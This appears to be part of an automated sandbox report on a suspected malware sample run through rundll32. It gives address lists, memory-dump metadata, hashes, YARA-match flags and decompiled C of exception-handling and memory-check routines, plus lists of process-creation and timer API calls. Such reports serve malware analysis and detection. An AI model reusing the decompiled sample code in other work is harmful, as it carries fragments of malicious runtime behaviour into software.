                            0x04a14c05
                            0x04a14c06
                            0x04a14c24
                            0x04a14c26
                            0x04a14c29
                            0x04a14c2c
                            0x04a14c2c
                            0x04a14c2f
                            0x04a14c2f
                            0x04a14c32
                            0x04a14c32
                            0x04a14c35
                            0x04a14c35
                            0x04a14c52
                            0x04a14c55
                            0x04a14c6b
                            0x04a14c6e
                            0x04a14c88
                            0x04a14c8b
                            0x04a14ca1
                            0x04a14ca4
                            0x04a14ca6
                            0x04a14cbe
                            0x04a14cc1
                            0x04a14cc4
                            0x04a14cdc
                            0x04a14cdf
                            0x04a14cf9
                            0x04a14cfc
                            0x04a14d12
                            0x04a14d15
                            0x04a14d17
                            0x04a14d2f
                            0x04a14d34
                            0x04a14d37
                            0x04a14d4d
                            0x04a14d50
                            0x04a14d6a
                            0x04a14d6d
                            0x04a14d83
                            0x04a14d86
                            0x04a14d88
                            0x04a14da3
                            0x04a14da6
                            0x04a14dbd
                            0x04a14dc0
                            0x04a14dc4
                            0x04a14ddd
                            0x04a14de0
                            0x04a14de2
                            0x04a14de5
                            0x04a14e00
                            0x04a14e03
                            0x04a14e1c
                            0x04a14e1f
                            0x04a14e2f
                            0x04a14e32
                            0x04a14e4a
                            0x04a14e4d
                            0x04a14e67
                            0x04a14e6a
                            0x04a14e82
                            0x04a14e85
                            0x04a14e9b
                            0x04a14e9e
                            0x04a14eb6
                            0x04a14eb9
                            0x04a14ed1
                            0x04a14ed4
                            0x04a14eee
                            0x04a14ef1
                            0x04a14f07
                            0x04a14f0a
                            0x04a14f22
                            0x04a14f25
                            0x04a14f3f
                            0x04a14f42
                            0x04a14f5a
                            0x04a14f5d
                            0x04a14f73
                            0x04a14f76
                            0x04a14f8e
                            0x04a14f91
                            0x04a14fa9
                            0x04a14fac
                            0x04a14fbe
                            0x04a14fc1
                            0x04a14fd3
                            0x04a14fd6
                            0x04a14fe8
                            0x04a14feb
                            0x04a14fef
                            0x04a14fff
                            0x04a15002
                            0x04a15010
                            0x04a15013
                            0x04a15025
                            0x04a15028
                            0x04a1503c
                            0x04a1503f
                            0x04a15041
                            0x04a15051
                            0x04a15054
                            0x04a15066
                            0x04a15069
                            0x04a15077
                            0x04a1507a
                            0x04a1508c
                            0x04a1508f
                            0x04a15093
                            0x04a150a3
                            0x04a150a6
                            0x04a150b8
                            0x04a150bb
                            0x04a150c9
                            0x04a150cc
                            0x04a150de
                            0x04a150e1
                            0x04a150f3
                            0x04a150f6
                            0x04a1510a
                            0x04a1510d
                            0x04a15121
                            0x04a15124
                            0x04a15138
                            0x04a1513b
                            0x04a1514f
                            0x04a15152
                            0x04a15166
                            0x04a15169
                            0x04a1517d
                            0x04a15182
                            0x04a15194
                            0x04a15197
                            0x04a151ab
                            0x04a151ae
                            0x04a151c2
                            0x04a151c5
                            0x04a151db
                            0x04a151de
                            0x04a151f2
                            0x04a151f5
                            0x04a15207
                            0x04a1520a
                            0x04a1521e
                            0x04a15221
                            0x04a15235
                            0x04a15238
                            0x04a1524c
                            0x04a15255
                            0x04a15258
                            0x04a15261
                            0x04a1526a
                            0x04a15272
                            0x04a1527a
                            0x04a15284
                            0x04a15299

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                            • Instruction ID: 95bbaed0c66f636092543369435f8a2c614d658ffc67b69e4860991b1d1ef1d1
                            • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                            • Instruction Fuzzy Hash: B322847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F667CA Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: d9c3ad45da20a701a551a10000620ec3ab6216f876ff83bb5e962b556fc55341
                            • Instruction ID: 49ecf751d4d2a9501e8ea27212f63bd83404a3b6fc2c9fac75ba9d9746c6f138
                            • Opcode Fuzzy Hash: d9c3ad45da20a701a551a10000620ec3ab6216f876ff83bb5e962b556fc55341
                            • Instruction Fuzzy Hash: 3D425430A04B458FDB29CF69C4806AABBF1FF49304F58896ED49BDB651E734B486CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A184C1 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A184C1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x4a1a380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4a1a3c8 = 1;
										__eflags =  *0x4a1a3c8;
										if( *0x4a1a3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x4a1a380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4a1a3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x4a1a380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x4a1a388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x4a1a384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x4a1a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4a1a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4a1a3c8 = 1;
							__eflags =  *0x4a1a3c8;
							if( *0x4a1a3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x4a1a388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x4a1a388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4a1a3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x4a1a388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x4a1a380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x4a1a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4a1a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                            0x04a184cb
                            0x04a184ce
                            0x04a184d4
                            0x04a184f2
                            0x00000000
                            0x04a184f2
                            0x04a184dc
                            0x04a184e5
                            0x04a184eb
                            0x04a184fa
                            0x04a184fd
                            0x04a18500
                            0x04a1850a
                            0x04a1850a
                            0x04a1850c
                            0x04a1850f
                            0x04a18511
                            0x04a18511
                            0x04a18513
                            0x04a18516
                            0x00000000
                            0x00000000
                            0x04a18518
                            0x04a1851a
                            0x04a18580
                            0x04a18580
                            0x04a186de
                            0x00000000
                            0x04a186de
                            0x04a1851c
                            0x04a1851c
                            0x04a18520
                            0x04a18522
                            0x04a18522
                            0x04a18522
                            0x04a18522
                            0x04a18525
                            0x04a18526
                            0x04a18529
                            0x04a18529
                            0x04a1852d
                            0x04a18531
                            0x04a1853f
                            0x04a1853f
                            0x04a18547
                            0x04a1854d
                            0x04a1854f
                            0x04a18551
                            0x04a18561
                            0x04a1856e
                            0x04a18572
                            0x04a18577
                            0x04a18579
                            0x04a185f7
                            0x04a185f7
                            0x04a1857b
                            0x04a1857b
                            0x04a1857b
                            0x04a185f9
                            0x04a185fb
                            0x04a186dc
                            0x04a186dc
                            0x00000000
                            0x04a18601
                            0x04a18601
                            0x04a18608
                            0x00000000
                            0x00000000
                            0x04a1860e
                            0x04a18612
                            0x04a1866e
                            0x04a18670
                            0x04a18678
                            0x04a1867a
                            0x04a1867c
                            0x00000000
                            0x00000000
                            0x04a1867e
                            0x04a18684
                            0x04a18686
                            0x04a18688
                            0x04a1869d
                            0x04a1869d
                            0x04a1869f
                            0x04a186ce
                            0x04a186d5
                            0x00000000
                            0x04a186d5
                            0x04a186a3
                            0x04a186a4
                            0x04a186a6
                            0x04a186a8
                            0x04a186a8
                            0x04a186aa
                            0x04a186ac
                            0x04a186ae
                            0x04a186c2
                            0x04a186c2
                            0x04a186c5
                            0x04a186c7
                            0x04a186c7
                            0x04a186c8
                            0x04a186c8
                            0x00000000
                            0x04a186b0
                            0x04a186b0
                            0x04a186b0
                            0x04a186b9
                            0x04a186ba
                            0x04a186bc
                            0x04a186be
                            0x04a186be
                            0x00000000
                            0x04a186b0
                            0x04a186ae
                            0x04a1868a
                            0x04a18691
                            0x04a18691
                            0x04a18693
                            0x00000000
                            0x00000000
                            0x04a18695
                            0x04a18696
                            0x04a18699
                            0x04a1869b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a1869b
                            0x00000000
                            0x04a18691
                            0x04a18614
                            0x04a18617
                            0x04a1861c
                            0x00000000
                            0x00000000
                            0x04a18625
                            0x04a18627
                            0x04a1862d
                            0x00000000
                            0x00000000
                            0x04a18633
                            0x04a18639
                            0x00000000
                            0x00000000
                            0x04a1863f
                            0x04a18641
                            0x04a1864a
                            0x04a1864e
                            0x00000000
                            0x00000000
                            0x04a18654
                            0x04a18657
                            0x04a18659
                            0x00000000
                            0x00000000
                            0x04a18660
                            0x04a18662
                            0x00000000
                            0x00000000
                            0x04a18664
                            0x04a18668
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a18668
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a18553
                            0x04a18553
                            0x04a18553
                            0x04a1855a
                            0x00000000
                            0x00000000
                            0x04a1855c
                            0x04a1855d
                            0x04a1855f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a1855f
                            0x04a18587
                            0x04a18589
                            0x00000000
                            0x00000000
                            0x04a18599
                            0x04a1859b
                            0x04a1859d
                            0x00000000
                            0x00000000
                            0x04a185a3
                            0x04a185aa
                            0x04a185d6
                            0x04a185d6
                            0x04a185d8
                            0x04a185da
                            0x04a185ee
                            0x04a185f0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a185dc
                            0x04a185dc
                            0x04a185dc
                            0x04a185e5
                            0x04a185e6
                            0x04a185e8
                            0x04a185ea
                            0x04a185ea
                            0x00000000
                            0x04a185dc
                            0x04a185ac
                            0x04a185ac
                            0x04a185af
                            0x04a185b1
                            0x04a185c3
                            0x04a185c3
                            0x04a185c6
                            0x04a185c8
                            0x04a185c8
                            0x04a185c9
                            0x04a185c9
                            0x04a185cf
                            0x04a185cf
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a185b3
                            0x04a185b3
                            0x04a185b3
                            0x04a185ba
                            0x00000000
                            0x00000000
                            0x04a185bc
                            0x04a185bc
                            0x04a185bd
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a185bd
                            0x04a185bf
                            0x04a185c1
                            0x04a185d4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a185d4
                            0x00000000
                            0x04a185c1
                            0x04a18533
                            0x04a18536
                            0x04a18539
                            0x00000000
                            0x00000000
                            0x04a1853b
                            0x04a1853d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a1853d
                            0x04a18502
                            0x04a18504
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04A18572
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: MemoryQueryVirtual
                            • String ID:
                            • API String ID: 2850889275-0
                            • Opcode ID: 2c16ace53711c09604c94edfe1a939e8e5a8f4aeb0573eab283450eedcc9afbb
                            • Instruction ID: 46bde0a2027c29c6efd4f8dca21837209fe51690f4fed6a0fe1dfbcac1e0e945
                            • Opcode Fuzzy Hash: 2c16ace53711c09604c94edfe1a939e8e5a8f4aeb0573eab283450eedcc9afbb
                            • Instruction Fuzzy Hash: 8561E4347006159FDB29EF29C99066973A2FB89364F248A2DD857CB2B4E73DF8428740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F78E57 Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04F78EC7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateProcessUser
                            • String ID:
                            • API String ID: 2217836671-0
                            • Opcode ID: 9ab98bd4843a2df4ac8b19a7a084fabd866b1d64e17c2ae9836569d3666f8558
                            • Instruction ID: c6e72491d28ac94496ba4deed68b683141b42f543668d46ae7e65e5de82a1137
                            • Opcode Fuzzy Hash: 9ab98bd4843a2df4ac8b19a7a084fabd866b1d64e17c2ae9836569d3666f8558
                            • Instruction Fuzzy Hash: D811B33250414DBFDF025E98DD04DEA7BAAFF0C3A4B09511AFE1956120C736D872AF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F636BB Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                            Download Yara Rule
                            APIs
                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04F636D3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorStatus
                            • String ID:
                            • API String ID: 1596131371-0
                            • Opcode ID: d78c83681be9171929a427a101338b4d42dd60db73cfb8e3616652f3f606c531
                            • Instruction ID: bb2d292170859ab6081c938d580ad7ea10743df4024c6023e900bce7c4123622
                            • Opcode Fuzzy Hash: d78c83681be9171929a427a101338b4d42dd60db73cfb8e3616652f3f606c531
                            • Instruction Fuzzy Hash: C6C012369052027BDA095A50E828D3A7E51EB50340F00441CB54688060CA759850C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F83DB0 Relevance: .1, Instructions: 77COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                            • Instruction ID: c1c644c12188c8c03b4a164d15e75fcba5e9c6277b8becfd520ba98780ea0b2f
                            • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                            • Instruction Fuzzy Hash: BE21A472900204ABDB14EF68CCC096BB7A5FF44710B05856DDD558F255E731F91AC7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1829C Relevance: .1, Instructions: 77COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E04A1829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E04A18407(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E04A184C1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E04A183AC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E04A18407(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E04A184A3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                            0x04a182a0
                            0x04a182a1
                            0x04a182a2
                            0x04a182a5
                            0x04a182a7
                            0x04a182aa
                            0x04a182ab
                            0x04a182ad
                            0x04a182ae
                            0x04a182af
                            0x04a182b2
                            0x04a182bc
                            0x04a1836d
                            0x04a18374
                            0x04a1837d
                            0x04a182c2
                            0x04a182c2
                            0x04a182c8
                            0x04a182ce
                            0x04a182d1
                            0x04a182d4
                            0x04a182d8
                            0x04a182dd
                            0x04a182e2
                            0x04a18362
                            0x00000000
                            0x04a182e4
                            0x04a182e4
                            0x04a182f0
                            0x04a182f2
                            0x04a1834d
                            0x04a1834d
                            0x04a18353
                            0x00000000
                            0x04a182f4
                            0x04a18303
                            0x04a18305
                            0x04a18306
                            0x04a18307
                            0x04a1830a
                            0x04a1830a
                            0x04a1830c
                            0x00000000
                            0x04a1830e
                            0x04a1830e
                            0x04a18358
                            0x04a18310
                            0x04a18310
                            0x04a18314
                            0x04a1831c
                            0x04a18321
                            0x04a18326
                            0x04a18332
                            0x04a1833a
                            0x04a18341
                            0x04a18347
                            0x04a1834b
                            0x00000000
                            0x04a1834b
                            0x04a1830e
                            0x04a1830c
                            0x00000000
                            0x04a182f2
                            0x04a18366
                            0x04a18366
                            0x04a18366
                            0x04a182e2
                            0x04a18382
                            0x04a18389

                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction ID: 346e7e8849604b6b91c5fe65ebe24afd0e117dfec154f05a3178facf7ce40e85
                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction Fuzzy Hash: 3F21B6729002049FDB10EF68C8C49ABB7A9FF44350B49856CD9599B255EB34FA15C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F637C2 Relevance: 54.4, APIs: 36, Instructions: 424synchronizationtimethreadCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F75C28: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04F75C5C
                              • Part of subcall function 04F75C28: GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04F75D1D
                              • Part of subcall function 04F75C28: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04F75D26
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 04F63860
                              • Part of subcall function 04F6A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04F6A990
                              • Part of subcall function 04F6A976: CreateWaitableTimerA.KERNEL32(04F8A1E8,00000001,?), ref: 04F6A9AD
                              • Part of subcall function 04F6A976: GetLastError.KERNEL32(?,00000000,04F78C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F6A9BE
                              • Part of subcall function 04F6A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6A9FE
                              • Part of subcall function 04F6A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA1D
                              • Part of subcall function 04F6A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04F78C06,00000000,00000000,0000801C), ref: 04F6AA33
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 04F638C3
                            • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 04F6393F
                            • StrTrimA.SHLWAPI(00000000,?), ref: 04F63961
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04F639A1
                              • Part of subcall function 04F6F08E: RtlAllocateHeap.NTDLL(00000000,00000010,7620F730), ref: 04F6F0B0
                              • Part of subcall function 04F6F08E: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,04F63899,?), ref: 04F6F0DE
                            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 04F63A47
                            • CloseHandle.KERNEL32(?), ref: 04F63CD6
                              • Part of subcall function 04F6E2E6: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,04F63A69,?), ref: 04F6E2F2
                              • Part of subcall function 04F6E2E6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,04F63A69,?), ref: 04F6E320
                              • Part of subcall function 04F6E2E6: ResetEvent.KERNEL32(?,?,?,?,?,04F63A69,?), ref: 04F6E33A
                            • WaitForSingleObject.KERNEL32(?,00000000,?), ref: 04F63A7C
